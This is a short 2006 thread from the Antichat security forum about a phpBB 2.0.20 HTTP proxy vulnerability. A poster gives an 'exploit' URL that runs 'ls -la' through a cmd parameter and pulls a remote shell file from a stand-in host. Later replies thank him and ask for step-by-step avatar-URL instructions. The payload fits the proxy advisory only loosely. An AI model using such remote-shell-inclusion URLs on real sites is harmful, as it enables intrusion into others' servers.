Форум АНТИЧАТ

Форум АНТИЧАТ (https://forum.antichat.xyz/index.php)

- Forum for discussion of ANTICHAT (https://forum.antichat.xyz/forumdisplay.php?f=72)

- - phpBB 2.0.20 (https://forum.antichat.xyz/showthread.php?t=19042)

neM3Sis

13.05.2006 12:53

phpBB 2.0.20

PHPBB Unauthorized HTTP Proxy Vulnerability
http://www.securityfocus.com/bid/17965/info

phpBB is prone to a vulnerability that could permit it to become an unauthorized HTTP proxy.
An attacker can exploit this issue to manipulate phpBB into becoming an HTTP proxy.

Exploit :

Код:

http://www.example.com/somescript.php?cmd=ls%20-la&xpl=http://www.example2.com/someshell.txt

Dracula4ever

13.05.2006 14:06

This is a famous Exploit.....
10q

sasi	16.05.2006 19:46

@neM3Sis i read the article http://www.securityfocus.com/bid/17965/info but I can`t understand. Can u explain step by step. What I must put in avatar url for value.

Время: 18:37